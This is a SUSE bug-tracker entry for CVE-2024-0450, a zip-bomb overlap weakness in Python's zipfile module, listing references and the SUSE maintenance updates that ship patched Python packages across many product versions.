1221854 – (CVE-2024-0450) VUL-0: CVE-2024-0450: python: The zipfile module is vulnerable to "quoted-overlap"

Bug 1221854 (CVE-2024-0450) - VUL-0: CVE-2024-0450: python: The zipfile module is vulnerable to "quoted-overlap"

Summary: VUL-0: CVE-2024-0450: python: The zipfile module is vulnerable to "quoted-ove...

Status:	IN_PROGRESS

Alias:	CVE-2024-0450

Product:	SUSE Security Incidents
Classification:	Novell Products
Component:	Incidents (show other bugs)
Version:	unspecified
Hardware:	Other Other

Priority:	P3 - Medium Severity: Normal
Target Milestone:	---
Assignee:	Security Team bot
QA Contact:	Security Team bot

URL:	https://smash.suse.de/issue/398291/
Whiteboard:	CVSSv3.1:SUSE:CVE-2024-0450:6.2:(AV:L...
Keywords:

Depends on:
Blocks:

Clone This Bug

Reported:	2024-03-22 08:45 UTC by SMASH SMASH
Modified:	2024-07-15 16:36 UTC (History)
CC List:	3 users (show)

See Also:
Found By:	Security Response Team
Services Priority:
Business Priority:
Blocker:	---
Marketing QA Status:	---
IT Deployment:	---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description SMASH SMASH 2024-03-22 08:45:49 UTC

An issue was found in the CPython `zipfile` module affecting versions 3.12.2, 3.11.8, 3.10.13, 3.9.18, and 3.8.18 and prior.

The zipfile module is vulnerable to “quoted-overlap” zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed versions of CPython makes the zipfile module reject zip archives which overlap entries in the archive.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-0450
https://github.com/python/cpython/issues/109858
https://mail.python.org/archives/list/security-announce@python.org/thread/XELNUX2L3IOHBTFU7RQHCY6OUVEWZ2FG/
https://www.bamsoftware.com/hacks/zipbomb/
https://www.cve.org/CVERecord?id=CVE-2024-0450
https://github.com/python/cpython/commit/30fe5d853b56138dbec62432d370a1f99409fc85
https://github.com/python/cpython/commit/66363b9a7b9fe7c99eba3a185b74c5fdbf842eba
https://github.com/python/cpython/commit/a2c59992e9e8d35baba9695eb186ad6c6ff85c51
https://github.com/python/cpython/commit/a956e510f6336d5ae111ba429a61c3ade30a7549
https://github.com/python/cpython/commit/d05bac0b74153beb541b88b4fca33bf053990183
https://github.com/python/cpython/commit/fa181fcf2156f703347b03a3b1966ce47be8ab3b
https://mail.python.org/archives/list/security-announce
https://seclists.org/oss-sec/2024/q1/240
https://www.cve.org/CVERecord?id=CVE-2023-6597

Comment 1 OBSbugzilla Bot 2024-03-22 11:35:04 UTC

This is an autogenerated message for OBS integration:
This bug (1221854) was mentioned in
https://build.opensuse.org/request/show/1160579 Factory / python310
https://build.opensuse.org/request/show/1160580 Factory / python39
https://build.opensuse.org/request/show/1160582 Factory / python38

Comment 3 OBSbugzilla Bot 2024-03-24 03:35:07 UTC

This is an autogenerated message for OBS integration:
This bug (1221854) was mentioned in
https://build.opensuse.org/request/show/1161042 Factory / python39

Comment 4 OBSbugzilla Bot 2024-03-24 09:35:16 UTC

This is an autogenerated message for OBS integration:
This bug (1221854) was mentioned in
https://build.opensuse.org/request/show/1161074 Factory / python310
https://build.opensuse.org/request/show/1161081 Factory / python311

Comment 6 Maintenance Automation 2024-03-27 16:30:09 UTC

SUSE-SU-2024:1009-1: An update that solves three vulnerabilities and has one security fix can now be installed.

Category: security (important)
Bug References: 1211301, 1219559, 1219666, 1221854
CVE References: CVE-2023-52425, CVE-2023-6597, CVE-2024-0450
Maintenance Incident: [SUSE:Maintenance:33053](https://smelt.suse.de/incident/33053/)
Sources used:
openSUSE Leap 15.3 (src):
 python39-3.9.19-150300.4.41.1, python39-documentation-3.9.19-150300.4.41.1, python39-core-3.9.19-150300.4.41.2
openSUSE Leap 15.5 (src):
 python39-3.9.19-150300.4.41.1, python39-documentation-3.9.19-150300.4.41.1, python39-core-3.9.19-150300.4.41.2
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src):
 python39-3.9.19-150300.4.41.1, python39-core-3.9.19-150300.4.41.2
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src):
 python39-3.9.19-150300.4.41.1, python39-core-3.9.19-150300.4.41.2
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src):
 python39-3.9.19-150300.4.41.1, python39-core-3.9.19-150300.4.41.2
SUSE Enterprise Storage 7.1 (src):
 python39-3.9.19-150300.4.41.1, python39-core-3.9.19-150300.4.41.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 7 Maintenance Automation 2024-04-08 12:30:03 UTC

SUSE-SU-2024:1162-1: An update that solves three vulnerabilities and has two security fixes can now be installed.

Category: security (important)
Bug References: 1189495, 1211301, 1219559, 1219666, 1221854
CVE References: CVE-2023-52425, CVE-2023-6597, CVE-2024-0450
Maintenance Incident: [SUSE:Maintenance:33187](https://smelt.suse.de/incident/33187/)
Sources used:
openSUSE Leap 15.4 (src):
 python310-documentation-3.10.14-150400.4.45.1, python310-3.10.14-150400.4.45.1, python310-core-3.10.14-150400.4.45.1
openSUSE Leap 15.5 (src):
 python310-documentation-3.10.14-150400.4.45.1, python310-3.10.14-150400.4.45.1, python310-core-3.10.14-150400.4.45.1
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4 (src):
 python310-3.10.14-150400.4.45.1, python310-core-3.10.14-150400.4.45.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP4 (src):
 python310-3.10.14-150400.4.45.1, python310-core-3.10.14-150400.4.45.1
SUSE Linux Enterprise Desktop 15 SP4 LTSS 15-SP4 (src):
 python310-3.10.14-150400.4.45.1, python310-core-3.10.14-150400.4.45.1
SUSE Linux Enterprise Server 15 SP4 LTSS 15-SP4 (src):
 python310-3.10.14-150400.4.45.1, python310-core-3.10.14-150400.4.45.1
SUSE Linux Enterprise Server for SAP Applications 15 SP4 (src):
 python310-3.10.14-150400.4.45.1, python310-core-3.10.14-150400.4.45.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 8 Matej Cepl 2024-04-15 17:26:24 UTC

This should be finally all. Thank you, Daniel!

Comment 17 Maintenance Automation 2024-05-08 12:30:05 UTC

SUSE-SU-2024:1556-1: An update that solves three vulnerabilities and has three security fixes can now be installed.

Category: security (important)
Bug References: 1189495, 1211301, 1219559, 1219666, 1221260, 1221854
CVE References: CVE-2023-52425, CVE-2023-6597, CVE-2024-0450
Maintenance Incident: [SUSE:Maintenance:33618](https://smelt.suse.de/incident/33618/)
Sources used:
openSUSE Leap 15.4 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1
openSUSE Leap 15.5 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1
Public Cloud Module 15-SP4 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1
Python 3 Module 15-SP5 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP4 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1
SUSE Linux Enterprise Desktop 15 SP4 LTSS 15-SP4 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1
SUSE Linux Enterprise Server 15 SP4 LTSS 15-SP4 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1
SUSE Linux Enterprise Server for SAP Applications 15 SP4 (src):
 python311-3.11.9-150400.9.26.1, python311-core-3.11.9-150400.9.26.1, python311-documentation-3.11.9-150400.9.26.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 25 OBSbugzilla Bot 2024-05-19 07:35:05 UTC

This is an autogenerated message for OBS integration:
This bug (1221854) was mentioned in
https://build.opensuse.org/request/show/1175099 Factory / python

Comment 27 Maintenance Automation 2024-05-24 16:30:12 UTC

SUSE-SU-2024:1774-1: An update that solves two vulnerabilities and has three security fixes can now be installed.

Category: security (important)
Bug References: 1219559, 1220664, 1221563, 1221854, 1222075
CVE References: CVE-2023-52425, CVE-2024-0450
Maintenance Incident: [SUSE:Maintenance:33975](https://smelt.suse.de/incident/33975/)
Sources used:
SUSE Linux Enterprise Micro 5.1 (src):
 python3-3.6.15-150000.3.147.1, python3-core-3.6.15-150000.3.147.1
SUSE Linux Enterprise High Performance Computing 15 SP2 LTSS 15-SP2 (src):
 python3-3.6.15-150000.3.147.1, python3-core-3.6.15-150000.3.147.1
SUSE Linux Enterprise Server 15 SP2 LTSS 15-SP2 (src):
 python3-3.6.15-150000.3.147.1, python3-core-3.6.15-150000.3.147.1
SUSE Linux Enterprise Server for SAP Applications 15 SP2 (src):
 python3-3.6.15-150000.3.147.1, python3-core-3.6.15-150000.3.147.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 28 Maintenance Automation 2024-05-29 20:30:02 UTC

SUSE-SU-2024:1847-1: An update that solves four vulnerabilities and has four security fixes can now be installed.

Category: security (important)
Bug References: 1214691, 1219559, 1219666, 1220664, 1221563, 1221854, 1222075, 1222109
CVE References: CVE-2022-48566, CVE-2023-52425, CVE-2023-6597, CVE-2024-0450
Maintenance Incident: [SUSE:Maintenance:33972](https://smelt.suse.de/incident/33972/)
Sources used:
SUSE Linux Enterprise Software Development Kit 12 SP5 (src):
 python36-core-3.6.15-55.1
SUSE Linux Enterprise High Performance Computing 12 SP5 (src):
 python36-core-3.6.15-55.1, python36-3.6.15-55.1
SUSE Linux Enterprise Server 12 SP5 (src):
 python36-core-3.6.15-55.1, python36-3.6.15-55.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src):
 python36-core-3.6.15-55.1, python36-3.6.15-55.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 29 Maintenance Automation 2024-05-29 20:30:10 UTC

SUSE-SU-2024:1844-1: An update that solves one vulnerability can now be installed.

Category: security (moderate)
Bug References: 1221854
CVE References: CVE-2024-0450
Maintenance Incident: [SUSE:Maintenance:33977](https://smelt.suse.de/incident/33977/)
Sources used:
SUSE Linux Enterprise High Performance Computing 12 SP5 (src):
 python-base-2.7.18-33.35.1, python-doc-2.7.18-33.35.1, python-2.7.18-33.35.1
SUSE Linux Enterprise Server 12 SP5 (src):
 python-base-2.7.18-33.35.1, python-doc-2.7.18-33.35.1, python-2.7.18-33.35.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src):
 python-base-2.7.18-33.35.1, python-doc-2.7.18-33.35.1, python-2.7.18-33.35.1
SUSE Linux Enterprise Workstation Extension 12 12-SP5 (src):
 python-base-2.7.18-33.35.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 30 Maintenance Automation 2024-05-29 20:30:12 UTC

SUSE-SU-2024:1843-1: An update that solves one vulnerability can now be installed.

Category: security (moderate)
Bug References: 1221854
CVE References: CVE-2024-0450
Maintenance Incident: [SUSE:Maintenance:33976](https://smelt.suse.de/incident/33976/)
Sources used:
Web and Scripting Module 12 (src):
 python3-3.4.10-25.130.1, python3-base-3.4.10-25.130.1
SUSE Linux Enterprise Software Development Kit 12 SP5 (src):
 python3-3.4.10-25.130.1, python3-base-3.4.10-25.130.1
SUSE Linux Enterprise High Performance Computing 12 SP5 (src):
 python3-3.4.10-25.130.1, python3-base-3.4.10-25.130.1
SUSE Linux Enterprise Server 12 SP5 (src):
 python3-3.4.10-25.130.1, python3-base-3.4.10-25.130.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src):
 python3-3.4.10-25.130.1, python3-base-3.4.10-25.130.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 37 Maintenance Automation 2024-07-15 16:36:31 UTC

SUSE-SU-2024:2479-1: An update that solves four vulnerabilities and has three security fixes can now be installed.

Category: security (important)
Bug References: 1219559, 1220664, 1221563, 1221854, 1222075, 1226447, 1226448
CVE References: CVE-2023-52425, CVE-2024-0397, CVE-2024-0450, CVE-2024-4032
Maintenance Incident: [SUSE:Maintenance:33974](https://smelt.suse.de/incident/33974/)
Sources used:
openSUSE Leap 15.3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2, python3-documentation-3.6.15-150300.10.65.1
openSUSE Leap Micro 5.3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
openSUSE Leap Micro 5.4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
openSUSE Leap 15.5 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2, python3-documentation-3.6.15-150300.10.65.1
openSUSE Leap 15.6 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2, python3-documentation-3.6.15-150300.10.65.1
SUSE Linux Enterprise Micro for Rancher 5.3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Micro 5.3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Micro for Rancher 5.4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Micro 5.4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Micro 5.5 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
Basesystem Module 15-SP5 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
Basesystem Module 15-SP6 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
Development Tools Module 15-SP5 (src):
 python3-core-3.6.15-150300.10.65.1
Development Tools Module 15-SP6 (src):
 python3-core-3.6.15-150300.10.65.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise High Performance Computing LTSS 15 SP4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Desktop 15 SP4 LTSS 15-SP4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Server 15 SP4 LTSS 15-SP4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Server for SAP Applications 15 SP4 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Manager Proxy 4.3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Manager Retail Branch Server 4.3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Manager Server 4.3 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Enterprise Storage 7.1 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Micro 5.2 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2
SUSE Linux Enterprise Micro for Rancher 5.2 (src):
 python3-core-3.6.15-150300.10.65.1, python3-3.6.15-150300.10.65.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.